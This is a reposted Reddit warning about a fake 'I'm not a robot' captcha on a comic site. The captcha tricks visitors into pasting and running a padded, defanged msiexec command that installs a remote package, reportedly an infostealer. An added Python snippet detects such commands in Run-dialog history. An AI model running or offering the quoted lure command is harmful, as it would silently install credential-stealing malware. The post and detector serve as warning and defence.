this post was submitted on 23 Nov 2024
 
The original post: /r/piracy by /u/404_GravitasNotFound on 2024-11-22 23:39:24.

Visited the site to easily read comics, (it's easily googleable, the top level domain is li ...

This is a normally reputable site to read comics (mainly western).

It has had captchas for a long time when you started reading something.

However, this time, when I opened "Watchmen, Doomsday Clock", I received a small "I'm not a robot" checkmark; upon pressing, it gave a small floating window requesting me to do the following steps:

1.- Press "Win + R"

2.- Press "Ctrl + V"

3.- Press Enter.

Step 1 would've opened the "Run command" box, Step 2 would've pasted something, and Step 3 would've run whatever I pasted.

Of course I didn't proceed; after a minute or so, a page loaded that spoke of a document or something.

The page it loaded after that odd malicious captcha was:

https : //bffr1oai [.] monactinal [.] makeup/post/wJYpFHGkvqAzrglrqqOXJf

Which I'm not going to open.

The command it tried to get me to run was:

msiexec /fv ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ ‎ https [:] //memorizable [.] yachts/31u7dkr6dcgdh /q

I'm of course editing both URLs by adding a space and brackets around the dot and colon.

The spaces after msiexec /fv were part of the original clipboard data.

It would not affect the running of the command, but it would obfuscate what you are running, since the space in the "Run command" window is limited.

msiexec, for those that don't know, is the Windows installer...

Edit:

u/Erroredv1 mentions:

I looked into these before, and the times I executed the run command the result was always an infostealer

Troy Hunt (the creator of HIBP) received a phishing email of this fake captcha verification

I ran it for him in a controlled environment and the result was an infostealer

I'll edit with any update...
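
A defender-side check for the command shape described in the post, as an added example that is not part of the original post: it flags msiexec given a remote package URL, a quiet switch, and a long run of whitespace or invisible padding. The input source (Run-dialog history values from the RunMRU registry key, which end in `\1`), the padding threshold and the sample commands are assumptions.

```python
import re
import unicodedata

PAD_MIN = 10  # assumed threshold: a padding run this long is not normal typing
QUIET = re.compile(r"^[/-](q[nbrf]?|quiet)$", re.I)  # msiexec quiet-UI switches
REMOTE = re.compile(r"^https?://", re.I)

def is_padding(ch):
    # Whitespace, or an invisible Unicode "format" character such as U+200E
    return ch.isspace() or unicodedata.category(ch) == "Cf"

def longest_padding_run(cmd):
    best = run = 0
    for ch in cmd:
        run = run + 1 if is_padding(ch) else 0
        best = max(best, run)
    return best

def analyze_run_command(cmd):
    """Return the suspicious traits found in one Run-dialog command line."""
    cmd = cmd.removesuffix("\\1")  # RunMRU registry values end in "\1"
    # Normalise every padding character to a space before tokenising
    tokens = "".join(" " if is_padding(c) else c for c in cmd).split()
    findings = []
    if tokens:
        exe = re.split(r"[\\/]", tokens[0])[-1].lower()
        if exe in ("msiexec", "msiexec.exe"):
            findings.append("msiexec")
            if any(REMOTE.match(t) for t in tokens[1:]):
                findings.append("remote_package")
            if any(QUIET.match(t) for t in tokens[1:]):
                findings.append("quiet")
    if longest_padding_run(cmd) >= PAD_MIN:
        findings.append("padding")
    return findings

# Constructed samples (not taken from the post); the URL is a placeholder
SAMPLES = [
    "msiexec /fv" + " \u200e" * 40 + " https://pkg.example.invalid/abc /q\\1",
    "msiexec /i C:\\Installers\\app.msi\\1",
    "notepad\\1",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(analyze_run_command(s), repr(s[:30]))
```

The same function can be run over process-creation command lines from endpoint logs; only the `\1` suffix handling is specific to RunMRU values.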
